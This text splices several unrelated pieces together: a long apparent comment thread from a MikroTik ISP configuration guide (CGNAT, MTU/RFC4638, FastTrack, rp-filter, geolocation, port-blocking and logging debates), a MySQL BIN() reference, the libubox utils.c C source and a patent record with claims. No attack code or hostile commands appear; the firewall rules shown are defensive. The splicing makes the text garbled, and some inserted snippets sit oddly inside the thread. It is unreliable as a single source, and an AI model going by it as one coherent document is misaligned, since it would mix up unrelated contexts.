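add action=netmap chain=srcnat comment="CGNAT rule" dst-address-list=!not_in_internet ipsec-policy=out,none out-interface-list=WAN src-address-list=cgnat_subnets to-addresses=103.176.189.0/25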
28. Jeff
In your Edge Router Firewall section, I notice you’re now fasttracking stateless traffic.
#Filter rules for FastTracking stateless traffic#
/ip firewall filter
add action=fasttrack-connection chain=input
add action=fasttrack-connection chain=forward
add action=fasttrack-connection chain=output
But since connection tracking is disabled on Edge Routers, isn't all traffic in essence FastTracked by default? It sounds kind of redundant to me, but I'm obviously missing something.
• FastTrack never works "by default"; FastPath does, under limited conditions, and if you're using firewall address lists, FastPath is out the window as well.
And hence, for this reason, we manually "FastTrack" the traffic through the rules above. But I recently found it's logically more efficient and cleaner to do this in the mangle table. I'll update the article itself, but here's the snippet:
/ip firewall mangle
add action=fasttrack-connection chain=prerouting
add action=fasttrack-connection chain=output
29. Singu
Hi Daryll. I've followed your guide's MTU section about configuring RFC 4638. I've set the MTU and MRU to 1500 on the MikroTik PPPoE server, but I can only achieve a maximum MTU of 1492. I've already double-checked the MTU of the OLT and the MikroTik, with the OLT MTU set to its maximum value of 2000 and the MikroTik router MTU of 1500 and L2 MTU of 2000. I'm not sure what's going on and why it is not working. The ONUs are Huawei HG8145V5, or maybe the modem is not capable of RFC 4638.
• The BNG L3 MTU should be 2000 on the physical port to match the OLT L2/L3 MTU of 2000. The customer MikroTik router's L2 MTU should be maxed out, but L3 will be 2000 to match the OLT. ONUs should be in bridge mode, but some ONUs, even in bridge mode, don't support baby jumbo frames nor RFC4638. Also, if you have switches between the BNG and the OLT, they all need proper MTU config. Follow the MTU section sample.
Migrate to DHCPv4/v6 to avoid MTU problems.
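A minimal sketch of what the provider side looks like, with hypothetical interface names and an L2 MTU value that depends on your hardware; adjust to your own gear:
#Underlay towards the OLT carries baby jumbo frames#
/interface ethernet
set sfp-sfpplus1 l2mtu=2028 mtu=2000
/interface vlan
set vlan100-pppoe mtu=2000
#PPPoE server offers the full 1500 via RFC4638 (PPP-Max-Payload)#
/interface pppoe-server server
set [find] max-mtu=1500 max-mru=1500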
30. Stefan Müller
Hey Daryll,
I have just noted that you took both rules from here.
Is it just copy&paste (like me 🙂 ) or any reason to have both?
If I’m not mistaken, anything that could be caught by the second rule is caught by the first rule anyway.
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s protocol=tcp tcp-flags=syn,ack
• MikroTik copied it from here.
The second rule is definitely redundant, however with that being said, I’m planning to remove these two configuration parameters completely from the guide.
The reasoning being such configuration only makes sense for SOHO/Minuscule networks no bigger than my home lab 🙂
For production networks we should be using FastNetMon for detection + escalation and a third-party DDoS scrubber. The rules above do absolutely nothing when you’re hit with a real DDoS and more than likely block legitimate traffic in large networks.
31. Tony Da Silva
I have a strange issue – maybe somebody has an idea .
I have a CCR2004 with PPPOE set up. 10gbps connection to the internet and 10gbps link to local peering.
There is a 10gig connection at the DC between the fibre network operator and the CCR2004
Home has a 250mbps fibre link connected via ONT to the fibre network operator.
On client side, when doing download on cable, full 250mbps is achieved. When trying 5G wifi you get 150mbps download and 250mbps upload. There is no wifi interference at all. (Local downloads on wifi (onsite NAS) is achieving download speed of 700mbps)
Strangely, when downloading from a IPv6 address (on wifi), we get full 250mbps. It looks like something is causing poor performance on ipv4. Client CPE MTU is set to 1492 and on CCR2004 the MaxMTU and MAX MRU is left blank in the PPPOE Service config.
• Client CPE MTU is set to 1492 and on CCR2004 the MaxMTU and MAX MRU is left blank in the PPPOE Service config.
Why is MTU not configured end-to-end correctly, including RFC4638, as per the guide? Fix the MTU configuration.
Next, make sure CGNAT is correctly configured, routed to blackhole as per the guide. Reboot CGNAT box during off hours and test again.
Additionally, it sounds like you’re using a single CCR2004 for both edge routing and customer downstream delegation, stateful-ness on the edge is a bad idea to begin with, also explained in the guide.
• Tony Da Silva
Hello
Client end only goes to 1492 so should I rather set MAX MTU and MRU to 1492 on the BNG as well?
Don't use CGNAT for the clients as they have static IPv4. Blackhole routes are set up for those IPv4 ranges.
• No. MTU/MRU should always be 1500 on the PPPoE server, and the underlay MTU for the physical Ethernet and SFP cages would be jumbo frames, along with the VLAN L3 MTU and also any VPLS interfaces you may have.
The underlay network should carry jumbo frames, end-to-end, network wide.
Client doesn’t matter, even if it’s limited to only 1492. RFC4638 will do its job via the “PPP-Max-Payload” tag in the PPPoE negotiation procedure.
Feel free to reach out to our public community here.
32. Mario Martinez
My ISP actively uses an MTU of 1492, either as AS7303 or its upstream AS262589. Some sites in Brazil are dropping at 1500. Is one of the two filtering ICMP, or is there equipment set to 1492, damaging PMTUD?
The common user will never complain about this, as some modems behind NAT are hardcoded to 1490. i.imgur.com/aM3LwDV.jpeg
• Ask your ISP(s) to deploy RFC4638, point them to this guide. I can’t help you to change the mind of your ISP, you and other customers in your country need to raise complaints.
• There is a long-standing debate on uRPF vs rp-filter.
1. rp-filter only exists in the Linux kernel and OSes that use the Linux kernel for the networking control/data plane; it does not exist on major vendors like Cisco, Juniper etc., who use custom code for both the control and data plane.
2. uRPF is not officially supported on the Linux kernel, but it is supported on major vendors.
RFC 3704 only defines RPF, but never defined rp-filter:
https://en.wikipedia.org/wiki/Reverse-path_forwarding#Filtering_vs._forwarding
Regardless of the difference, it would be nice to have feasible mode rp-filter (or uRPF) with proper CPU/memory optimisations to avoid issues.
Even Juniper doesn’t support feasible mode as of now.
• My point is to have the possibility of disabling rp-filter per interface.
On a BNG that has a single PTP uplink, there is no issue with activating rp-filter=strict.
But on a BNG that has more than one uplink (one to a CDN router, another to CGNAT, another to BGP-Border-A, another to BGP-Border-B), asymmetry will certainly occur.
And because of just those few interfaces, we need to disable rp-filter or put it in loose mode globally on the box (all interfaces, including subscribers).
So…
"Hey MikroTik, allow me to disable rp-filter per interface."
Just that.
• What about some coordinated effort from several guys to "help" them understand the need?
Should we have no hope on that?
• If you’re looking for a campaign leader or group to teach MikroTik staff on the importance of per-interface rp-filter (or anything else of the sort), I’m afraid I’m not the right person for the job nor do I share an interest in such objectives.
I have a lot on my plate already, I don’t have the mental capacity, time nor schedule to go chasing after MikroTik to implement a 20-year-old feature.
33. About DST-NATing packets that reach public IPs to a loopback.
You mentioned that you used this solution to fix routing loops.
To be frank, I don't see that methodology as the prettiest. Ha-ha.
But I’ve already used something close to that.
The motivations were different! Geo-location!
Beyond all the cadastral efforts, latency triangulation has a high impact on the geolocation databases. I can say that from experience.
Hosting a RIPE Atlas probe and/or anchor will greatly accelerate the organic corrections of the geolocation databases.
But it (the probe) needs to be able to ping and traceroute to the IPs.
And this is the part where I would like to hear your opinion.
Between our guys, we reached two possible solutions:
a- DST-NATing everything that comes to Public IP Addresses to an IP on a loopback.
b- Putting all the 8, 16, or 32 /32 public IP addresses on a loopback.
To be sincere, I consider both methods ugly… But both work.
My experience until now makes me think that "b" is a bit better.
We can create a dedicated loopback for that and do some work with firewall rules matching the interface to avoid interaction with other packet flows.
Do you have an opinion about that?
• 1. I am planning to remove/update the dst-nat loopback method; these days I prefer blackhole routing of the CGNAT public range on each CGNAT box, which means zero loops.
2. I may still enable the dst-nat loopback hack, only for ICMP; this is for fun, bells and whistles, to allow customers and measurement probes to properly ping your CGNAT public range. Not mandatory, but "cool".
For Geo-location, you should be following the current standards based on RFC8805. Use this tool to verify your inetnum and inet6num objects are complying with RFC8805. You can test the tool with my IP ranges to see how it works.
Watch this video by Massimo Candela from NTT on the subject.
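To make that concrete, a hedged sketch on the CGNAT box, reusing the example public pool from this guide (ROS v7 syntax); the 10.255.255.1 loopback-bridge address is purely hypothetical:
#Blackhole the CGNAT public pool locally, which kills loops and keeps conn_track clean#
/ip route
add dst-address=103.176.189.0/25 blackhole comment="CGNAT public pool"
#Optional bells and whistles: answer ICMP aimed at the public pool via an address assigned to a loopback-style bridge#
/ip firewall nat
add action=dst-nat chain=dstnat dst-address=103.176.189.0/25 protocol=icmp to-addresses=10.255.255.1 comment="ICMP responder for CGNAT pool"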
• Yep! I know pretty much geofeeds.
But it still doesn’t have too much traction.
P.S.: Unfortunately, most of our customers depend on renting IPv4 addresses.
Yep… This is shit. But it is the intermediary solution until they buy their own blocks.
And, dealing with that kind of issue very frequently, we created a sequence of steps that usually solves issues with geolocation and CDN distribution, involving (non-exhaustive) things like Geofeed.csv + Whois remark, GeoIDX on IRR, and internal recursive DNS server IP addresses sharing the same AS-Path as the eyeball IP blocks…
But, in fact, the most effective action is related to latency triangulation.
Atlas probes, NLNOG RING, and others…
And responding to ping, traceroute, and some other probing that comes from them.
And exactly because of these probes, I asked you about it.
Thanks anyway.
• Geofeed and the method I described here works well. Within 15 days, all major GeoIP DB providers will show up-to-date location information. Whenever I received a new IP block, within 15 days, it’s fully-updated on the Geo providers.
I’ve spoken to one of the CEO/Founder of a GeoIP DB company, and they agreed my method is valid and effective and shared they’ve received many emails of people who followed my template/steps.
34. Ronald Chan
This document is gold; I couldn't ask for more. I hope a lot of documents on the internet will be like this. Because of this document I was able to polish my proof-of-concept dual-stack deployment, and the management is happy with the result; our PoC is now out of the beta stage and will soon be launched in selected PoPs in our network.
35. Hi Daryll,
Does this still work???
In my case we have ROS 6.49.8:
/ipv6 dhcp-server binding;
:foreach i in=[find server~"pppoe"] do={
make-static $i;
set $i comment=[get $i server];
set $i server=all;
}
36. “Blocks inbound ports based on the false logic of “protecting” the customer
Port blocking does nothing to improve security, it only breaks legitimate traffic such as apps or games that use various methods for VoIP”
I strongly disagree. We have a filter on the access-router of our POPs.
To filter a well-known list of ports, inbound only, for example 22, 23, 80, 443, 1723, to protect the management side of the customers' routers.
We open them on request by the client, and we have an outgoing filter for remote 135, 137-139 for example… and we match a lot of traffic.
• That is a stupid practice, and if I were subjected to such treatment by an ISP, I'd take it to court, and in many countries the court will rule in the consumer's favour in such cases.
It’s the customer’s responsibility/job to filter their routers, hosts etc to protect their network on their side, with their firewall filters from the public internet—Why is the ISP playing firewall here? What legal justification do you have to block those ports, when customers paid for their IPv4 addresses and IPv6 PDs?
ISP’s job is to provide transit capacity and pathways to the public internet, not play traffic police. I’m not sure what the laws and regulations are like in your country of operations, but I certainly wouldn’t want to live there, if the laws permit ISPs to play traffic police, this sounds more like communist China to me.
• Well, we have been an ISP in Italy since 2011;
we have never had a single complaint about filtered ports, inbound or outbound. They are put in place to stop the spread of the most common malware. If a customer asks for unfiltered ports, we open them for him, and they are a VERY small percentage. Since nowhere in our legislation does it say that I need to give you open ports or an unfiltered network, we put it into our contract.
I appreciate your work, but I'm just offering my opinion on your point.
Regards.
• I do not have knowledge of Italy laws and regulations, so I cannot comment on the legality of it. But if the consumers have no legal protection for “filter-free” internet access, on residential lines and/or commercial/enterprise lines, I’d be gravely concerned as a professional in this domain.
they are a VERY little percentage
That is because most customers are not network engineers, they aren’t technical persons, you know this. It’s not the job of the customer to reverse engineer the ISP and demand the ISP to implement best practices, net neutrality compliant network implementation etc, this is the job of the ISP’s board of directors, management, and engineering team and their governments, to do their due diligence.
I am a strong and vocal supporter of net neutrality-compliant network implementations, including net neutrality-friendly traffic shaping (example bufferbloat control via LibreQoS), therefore network traffic filtering topics, from my side, is driven by my political standpoint on the matter—for context.
I will conclude this with food for thought:
When you buy DIA (IP Transit) from Cogent and Telecom Italia Sparkle, do they perform port-blocking/filtering/traffic policing against your traffic inbound/outbound? Would you prefer if they did?
37. Hello…
Well, in Italy the regulations are so strict that, for example, since November 2023 we MUST filter content on our contracts; we MUST implement an adult-filtering DNS system to filter internet connections by default, to protect people under 18. The customer needs to explicitly ask to remove the filter.
When we sell lines to residential customers, we filter them by default, and allow a quick opt-out policy if needed (if they have the public IP, since we also offer lines in CGN).
Enterprise customers are unfiltered if they ask. We just inform them.
About transit: transit, by default, needs to be unfiltered since we are an ISP, not an end user.
• DNS/SNI-based filtering is something that, unfortunately, is being enforced at a global scale by many governments. This is leading to fragmentation of the internet ecosystem; if telcos, ISPs and WISPs globally don't come together, we're in deep trouble in the coming decade. It starts with "adult filtering" and then moves to censorship of the press, censorship of journalism etc 🙁
However, as a network engineer myself, you may have noticed I never mentioned DNS/SNI filtering in my guide. This is because:
1. It does not violate the end-to-end principle of IP Networking.
2. It does not break layer 4 reachability.
3. No packet mangling/molestation.
4. Zero impact to ephemeral ports for UDP, STUN/TURN/Hole punching applications.
5. Network operators are forced by governments, because, well, governments like to play tech-bro, unfortunately.
6. Customers can use DoH/DoQ/DoT/DoH3 of third-party recursives to bypass—But even this is becoming a shit-show, see references below:
A. https://torrentfreak.com/cloudflare-dns-has-to-block-pirate-sites-italian-court-confirms-230403/
B. https://torrentfreak.com/dns-resolver-quad9-loses-global-pirate-site-blocking-case-against-sony-230308/
My recommendation is to educate your customers (via website? Blog? FAQ? Email?) to have a firewall configured on their CE (customer edge router) for Layer 3-4 protection (IPs, ports, TCP/UDP/other L4 protocols). Give them routers with pre-configured templates. Most CPEs already have stateful firewalling enabled by default by OEMs anyway.
On the ISP side, only a few ports, in my opinion, have a valid use-case for blocking by default with the ability for exceptions on request: port 25 (because of email spammers) and, in some countries, SIP ports (call scammers etc.).
Side note:
I hope you’re providing native IPv6 with BCOP-690 compliances to your customers.
38. Francisco Mercedes
Hello, would it be possible for you to make a small diagram about the architecture of these configurations?
• The configuration principles and examples are largely topology-independent. The "Edge router" configuration is applicable to any router or layer 3 device that is stateless; the "BNG" configuration is applicable to any router or layer 3 device that is stateful.
39. Nick Tait
Hi Daryll.
I have a couple of Mikrotik routers in my home network, so I was very interested in what you said about Router Advertisements being used on all interfaces by default.
However I’ve just done some packet captures, and these seem to paint a different picture to what you described. Specifically my testing shows that while the “ipv6 nd” settings define the Router Advertisement parameters (RA interval, RA lifetime, etc), the decision about whether or not to send Router Advertisements is based on the IPv6 address configurations.
If you run “ipv6 address print” you can see all the configured interfaces and whether or not they are configured to send Router Advertisements.
In particular it is worth noting:
* IPv6 Link-Local addresses (which are assigned to interfaces automatically) don’t generate Router Advertisements. The “export” command doesn’t list these.
* IPv6 addresses that have been added with advertise=no don’t result in Router Advertisements. The “export” command shows “advertise=no” for these addresses.
* IPv6 addresses that don’t have advertise=no will generate Router Advertisements. The “export” command doesn’t show any “advertise” parameter for these addresses.
Rather than advising people to disable the “ipv6 nd” configuration, I think the advice should be to add “advertise=no” to IPv6 addresses that you add, unless you actually do want Router Advertisements sent?
Thanks,
Nick.
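For illustration, a minimal sketch of what Nick describes, using the IPv6 documentation prefix and a hypothetical interface name; whether you want RAs sent depends on your deployment:
/ipv6 address
add address=2001:db8:100::1/64 interface=vlan100 advertise=no comment="No RAs for this prefix"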
40. Manohar Acharya
Hi Daryll,
I found your post very useful. I tried to follow all the steps you mentioned. I love it, and deployed it in my ISP network. But I still have some confusion. I have a switch connected in the path between the PPPoE NAS and the PPPoE client (Huawei ONT). From the client end I run the test ping google.com -f -l 1452 without packet fragmentation. On the Huawei ONT WAN I have set up an MSS of 1480. I want to know what the best MSS for that client would be. I found it could be something like 1452 or less, but I'm confused.
Below is my simple topology.
PPPoE-Server>VLANs>Ethernet>LACP>Switch>OLT>ONT (my switch does not support an MTU greater than 1600 and also carries different VLANs for BGP (ISP uplink) etc.). Please suggest the best solution on the PPPoE NAS (MikroTik) / PPPoE client (Huawei ONT).
• The proper solution is to deploy RFC4638 on provider side as per my guide. 1600 MTU on the switch is more than sufficient for client to get native 1500 MTU over PPPoE.
TCP MSS clamping should be disabled in a production network. Use proper MTU.
41. Douglas Fischer
Hey Daryll
Things like NAT-Endpoint-Independent and NAT-PMP came into RouterOS.
Other things also.
Do you think this should be included in this optimization guide?
• I’m using EIM-NAT myself in CGNAT production and in home lab. I’ll update the guide to include this next year. But MikroTik EIM-NAT is not on par with Cisco and Juniper as it only supports UDP and not TCP. I suggest you reach out to their official support and ask for Cisco-grade EIM-NAT.
NAT-PMP is 10 years too late, we’re in IPv6 era now. The overhead that comes with NAT-PMP is better spent on something like 464xlat or MAP-T.
42. Douglas Fischer
Volume of data with CGNAT logging using Traffic Flow without BPA.
We know that RouterOS does not support Bulk Port Allocation.
And I’m a little curious about the resulting storage volume for this logging scenario through Traffic-Flow without the Bulk port Allocation feature.
From what I understand, it uses NEL – NetFlow Event Logging, but does not use Port Block Allocation / Deallocation events. In other words, each new connection created/closed is a new LOG entry.
Daryll, can you give an estimate of the daily log volume for a real CGNAT scenario, providing a reference for the number of users or Gbps passing through the CGNAT box?
• I don't think anyone can give a reference number, as this is a case of complete randomness across different networks and demographics.
But here’s what I do know:
If I have 1000 customers behind a single BNG, and all 1k customer routers have IPv6 enabled for WAN and LAN, I've observed 80-90% of the traffic for those 1k customers going over IPv6 instead, especially CDN/content traffic. The remaining 10-20% is CGNAT, with my netmap method.
• Douglas Fischer
Well… I can share some reference of CGNAT scenarios using A10 and NFWare, which could provide a basis for comparison.
In scenarios here in Brazil, with Dual-Stack IPv6+IPv4, IPv6 being reasonably well deployed, and IPv4 in CGNAT.
In ISPs with CDNs caches within their own network, which means a certain prioritization of access to cached content.
And also with By-Pass to CGNAT of what is accessed by subscribers to these CDN caches (OCA, GGC, FNA) and also internal servers such as their own recursive DNS.
Configuring BPA to:
– Block of 768 ports in the first allocation.
– Additional blocks of 256 ports.
– Maximum 2048 public ports allocated to each subscriber.
– Connection timeout respecting RFC timeouts (Ex.: 2hours and 4 minutes to TCP).
– Synchronized ranges allocated between TCP and UDP for the same subscriber.
In a network with approximately 15K clients, the box generates a volume of 150-180 Megabytes per day. Resulting in 15-30 Megabytes compressed.
I can also share that in similar scenarios (15K subscribers with IPv6 and CDN caches) where the ISP had very few public IPs available to use in CGNAT, and we had to be more limiting on BPA settings:
– Unsynchronized TCP and UDP range.
– 256 ports for the initial allocated block
– 128 ports for additional allocations
– TCP timeout in 30 minutes.
The volume of daily LOGs increased A LOT!
Approximately 800-900 Megabytes per day. And 120-150 Megabytes compressed.
And it is precisely because of this huge difference that I am curious to see how much volume a log per-connection scenario would bring.
• If you find out the data, let me know as well.
Keep in mind having such short TCP timeout value will affect multiplayer games that rely on TCP for state maintenance etc (gameplay data is over UDP of course).
It sounds like your customer routers on all 15k didn’t have IPv6 enabled for the LAN though.
At some point I’m starting to think it’s better to invest capital into buying v4 block after market to avoid CGNAT logging issues. Of course it’s not cheap.
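For anyone wanting a rough feel for per-connection logging volume, the arithmetic is straightforward; the sketch below uses purely illustrative assumptions (the subscriber count, connections per day and record size are not measurements from any network discussed here):

#include <stdio.h>

/* Back-of-the-envelope estimate for per-connection (no BPA) CGNAT
 * logging. Every number below is an illustrative assumption. */
int main(void)
{
	const double subscribers   = 15000.0;  /* assumed subscriber count                 */
	const double conns_per_day = 20000.0;  /* assumed new connections per subscriber   */
	const double bytes_per_rec = 64.0;     /* assumed size of one create/delete record */

	double records = subscribers * conns_per_day * 2.0;  /* create + delete events */
	double bytes   = records * bytes_per_rec;

	printf("~%.0f million records, ~%.1f GB per day uncompressed\n",
	       records / 1e6, bytes / 1e9);
	return 0;
}

Even with modest assumptions the result is orders of magnitude above the BPA figures quoted above, which is the expected effect of logging every single connection.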
43. Douglas Fischer Douglas Fischer
“such short TCP timeout”
I believe you are talking about 30 min…
Yep! It's a pain in the ass…
But it was the solution we found for the many abandoned connections that were present in ConnTrack.
Obs.: This ISP rented some IPs, and as we changed the BPA configs the log volumes came back to “normal”.
But with 2 hours and 4 minutes (RFC5382 REQ-5) there is no pain (support tickets from subscribers) related to that.
• Don’t forget to route the public pool to blackhole on the NAT box. This keeps the connection tracking table clean when user is offline or connection breaks etc. In addition to the RFC6890 blackhole.
3 years ago when I tested 2 hour timeout, it breaks CoD Warzone consistently. I stuck with 24 hours ever since + blackhole.
MySQL BIN() Function
Example
Return a binary representation of 15:
SELECT BIN(15);
Definition and Usage
The BIN() function returns a binary representation of a number, as a string value.
Syntax
BIN(number)
Parameter Values
Parameter: number
Description: Required. A number
Technical Details
Works in: From MySQL 4.0
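For readers who want to see exactly what the function computes, the following C sketch (not part of MySQL) reproduces BIN()'s behaviour for non-negative integers:

#include <stdio.h>

/* Build the binary-digit string for a non-negative integer,
 * mirroring what MySQL's BIN() returns (e.g. 15 -> "1111"). */
static void to_bin(unsigned long long n, char *out, size_t len)
{
	char buf[65];
	int i = 0;

	if (n == 0)
		buf[i++] = '0';
	while (n > 0) {
		buf[i++] = '0' + (n & 1);
		n >>= 1;
	}

	/* digits were collected least-significant first; reverse them */
	size_t j = 0;
	while (i > 0 && j + 1 < len)
		out[j++] = buf[--i];
	out[j] = '\0';
}

int main(void)
{
	char s[65];
	to_bin(15, s, sizeof(s));
	printf("BIN(15) -> %s\n", s);  /* prints 1111 */
	return 0;
}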
More Examples
Example
Return a binary representation of 111:
SELECT BIN(111);
Example
Return a binary representation of 8:
SELECT BIN(8);
[project/libubox.git] / utils.c
/*
 * utils - misc libubox utility functions
 *
 * Copyright (C) 2012 Felix Fietkau <[email protected]>
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 */

#include "utils.h"
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>

/* Iterate over the (pointer, length) pairs passed as varargs;
 * the list is terminated by a NULL pointer argument. */
#define foreach_arg(_arg, _addr, _len, _first_addr, _first_len) \
	for (_addr = (_first_addr), _len = (_first_len); \
	     _addr; \
	     _addr = va_arg(_arg, void **), _len = _addr ? va_arg(_arg, size_t) : 0)

/* Allocate one zero-initialised block large enough for all requested
 * chunks and fill in the caller-supplied pointers to each chunk, so the
 * whole allocation can later be released with a single free(). */
void *__calloc_a(size_t len, ...)
{
	va_list ap, ap1;
	void *ret;
	void **cur_addr;
	size_t cur_len;
	int alloc_len = 0;
	char *ptr;

	va_start(ap, len);

	/* first pass: sum up the total size of all requested chunks */
	va_copy(ap1, ap);
	foreach_arg(ap1, cur_addr, cur_len, &ret, len)
		alloc_len += cur_len;
	va_end(ap1);

	ptr = calloc(1, alloc_len);
	if (!ptr) {
		/* bail out if the allocation failed */
		va_end(ap);
		return NULL;
	}

	/* second pass: carve the single allocation into the chunks */
	alloc_len = 0;
	foreach_arg(ap, cur_addr, cur_len, &ret, len) {
		*cur_addr = &ptr[alloc_len];
		alloc_len += cur_len;
	}
	va_end(ap);

	return ret;
}

#ifdef __APPLE__
#include <mach/mach_time.h>

/* Older macOS lacks clock_gettime(); emulate CLOCK_REALTIME via
 * gettimeofday() and CLOCK_MONOTONIC via mach_absolute_time(). */
static void clock_gettime_realtime(struct timespec *tv)
{
	struct timeval _tv;

	gettimeofday(&_tv, NULL);
	tv->tv_sec = _tv.tv_sec;
	tv->tv_nsec = _tv.tv_usec * 1000;
}

static void clock_gettime_monotonic(struct timespec *tv)
{
	mach_timebase_info_data_t info;
	float sec;
	uint64_t val;

	mach_timebase_info(&info);

	val = mach_absolute_time();
	tv->tv_nsec = (val * info.numer / info.denom) % 1000000000;

	sec = val;
	sec *= info.numer;
	sec /= info.denom;
	sec /= 1000000000;
	tv->tv_sec = sec;
}

void clock_gettime(int type, struct timespec *tv)
{
	if (type == CLOCK_REALTIME)
		return clock_gettime_realtime(tv);
	else
		return clock_gettime_monotonic(tv);
}

#endif
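The function above is typically used to allocate a structure and its variable-length members in one contiguous block. A small usage sketch follows; the struct and helper are made up for illustration, and it assumes the calloc_a() wrapper macro from utils.h, which appends the terminating NULL argument that __calloc_a() expects:

#include <string.h>
#include "utils.h"

/* Hypothetical example: allocate a struct and its name buffer in one
 * contiguous block, so a single free() releases everything. */
struct host {
	char *name;
	int port;
};

static struct host *host_new(const char *name)
{
	struct host *h;
	char *name_buf;

	h = calloc_a(sizeof(*h), &name_buf, strlen(name) + 1);
	if (!h)
		return NULL;

	h->name = strcpy(name_buf, name);
	h->port = 0;
	return h;	/* free(h) also releases name_buf */
}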
Publication number: US 7027055 B2
Publication type: Grant
Application number: US 10/312,788
PCT number: PCT/AU2002/000527
Publication date: Apr 11, 2006
Filing date: Apr 30, 2002
Priority date: Apr 30, 2001
Fee status: Lapsed
Also published as: CA2414174A1, CA2414177A1, CA2414181A1, CA2414184A1, CA2414194A1, CA2414194C, EP1350160A1, EP1350160A4, EP1384137A1, EP1384137A4, EP1384138A1, EP1384138A4, EP1384139A1, EP1384139A4, EP1384159A1, EP1384159A4, US7085683, US7250944, US8121973, US20030191608, US20040017403, US20040034795, US20040036721, US20040059436, US20080216094, WO2002088924A1, WO2002088925A1, WO2002088926A1, WO2002088927A1, WO2002088988A1
Inventors: Mark Stephen Anderson, Dean Crawford Engelhardt, Damian Andrew Marriott, Suneel Singh Randhawa
Original Assignee: The Commonwealth of Australia
Data view of a modelling system
US 7027055 B2
Abstract
An observation sub-system is described wherein three-dimensional (3D) views of objects and their interactions over time are provided. Each different view is based on a fundamental visualization paradigm. Heavily interacting objects can be depicted as being located "close together". Rules are created so as to define the position of objects not only from the perspective of whether interaction occurred, but also the amount of interaction, and the rate of interaction. Despite using proximity to show whether an object is interacting with another, further visual mechanisms are used for the user to be able to analyze the type of data interaction, and the current state of affairs of interaction within a specified time slice. There are two types of forces acting on objects in the data view universe: gravitational (as a result of the mass of an object) and electrostatic (as a result of the charge on an object).
Claims(68)
1. A system for creating human observable objects in a modelling system consists of:
one or more representations of real or virtual objects;
one or more virtual universes wherein
a universe selection function determines whether a representation of a real or virtual object is presented as one or more virtual objects in one or more virtual universes; and
a start position function determines the start position of a virtual object in a universe;
a mapping from a representation of a real or virtual object to a virtual object with one or more visual, aural or haptic attributes and force related properties such that the position of a virtual object in a universe is determined by the force-related properties of said virtual object and the relative position and force related properties of zero or more other virtual objects.
2. A system according to claim 1 wherein a human determines said universe selection function.
3. A system according to claim 1 wherein a human determines said start position function.
4. A system according to claim 3 wherein said start position function places all virtual objects in a random position.
5. A system according to claim 3 wherein said start position function places all virtual objects in a common position.
6. A system according to claim 3 wherein said start position function places all virtual objects evenly distributed about the edge of said universe.
7. A system according to claim 1 wherein a real or virtual object is presented in zero or more virtual universes.
8. A system according to claim 1 wherein a said universe is two or three-dimensional.
9. A system according to claim 1 or 8 wherein a said universe has finite size and said virtual objects are constrained to be positioned within said universe.
10. A system according to claim 1 wherein said human observes a said universe from any position with any orientation.
11. A system according to claim 1 wherein a virtual object is deleted or changed.
12. A system according to claim 1 wherein a virtual object is added.
13. A system according to claim 1 wherein said mapping is changed.
14. A system according to claim 1 wherein force-related properties comprise attractive and/or repulsive force components between virtual objects and within a universe are calculated and summed to produce a resultant force and consequent possible change in position of a virtual object.
15. A system according to claim 1 wherein virtual objects can be grouped and said group has force related properties that are the aggregate of the force-related properties of the elements of said group.
16. A system according to claim 1 wherein a human temporarily changes the attributes or position of one or more virtual objects.
17. A system according to claim 1 wherein a function determined by a human determines a set of selected real or virtual objects that have a corresponding virtual object's attributes or position changed.
18. A system according to claim 17 wherein said human controls the degree of change.
19. A system according to claim 17 or 18 wherein a further function determined by a human determines a subset of said selected real or virtual objects that have a corresponding virtual object's attributes changed.
20. A system according to claim 1 wherein a human temporarily changes the attributes or position of one or more virtual objects for a predetermined period.
21. A system according to claim 17 wherein a corresponding virtual object's attributes or position are changed for a predetermined period.
22. A system according to claim 20 or 21 wherein said period begins when a predetermined state in a respective universe occurs.
23. A system according to claim 20 or 21 wherein said period begins at a predetermined time.
24. A system according to claim 20 or 21 wherein said period begins periodically.
25. A system according to claim 24 wherein said periodicity is changed by said human.
26. A system according to claim 1 wherein said universe selection function is changed.
27. A system according to claim 1 wherein universes can be added or deleted.
28. A system according to claim 1 wherein one or more universes is temporarily not human observable.
29. A system according to claim 1 wherein one or more universes is human observable at the same time.
30. A system according to claim 29 wherein said human determines the way in which a said one or more universe is represented.
31. A system according to claim 1 wherein said force-related properties are constrained to act within two or three dimensions.
32. A system according to claim 1 wherein a human determines the limit of the rate of change in position of a virtual object.
33. A system according to claim 1 wherein a function determined by a human determines a set of selected real or virtual objects that will also determine a corresponding virtual object's force related properties.
34. A system according to claim 33 wherein a force related property of a virtual object may result from being associated with one or more of said sets where force-related properties comprise attractive and/or repulsive force components between virtual objects and within a universe are calculated and summed to produce a resultant force and consequent possible change in position of a virtual object.
35. A system according to claim 33 wherein a human determines whether force related properties are to apply so as to create an interaction set of virtual objects.
36. A system according to claim 1 wherein a human determines that one or more of the force related properties of a virtual object decays over time.
37. A system according to claim 36 wherein said decay is zero or in accordance with a predetermined time related function.
38. A system according to claim 14 wherein the rate of change in a position of a virtual object is proportional to the resultant force exerted.
39. A system according to claim 14 wherein the rate of change of the rate of change in position of a virtual object is proportional to the resultant force exerted.
40. A system according to claim 1 wherein a human determines sets of virtual objects for which one or more prior positions are represented.
41. A system according to claim 40 wherein a human determines the time interval between the corresponding times of said one or more prior positions.
42. A system according to claim 41 wherein the representation is made visible.
43. A system according to claim 41 wherein a human determines the colour and transparency of the representation.
44. A system according to claim 41 wherein a human determines the number of representations to be made visible.
45. A system according to claim 1 wherein a human determines a set of virtual objects and also the relationship between virtual objects such that all virtual objects within the set have that relationship with any other virtual object that exists in the same universe or any other universe.
46. A system according to claim 45 wherein said relationship is represented by a line between virtual objects of predetermined style, width and colour.
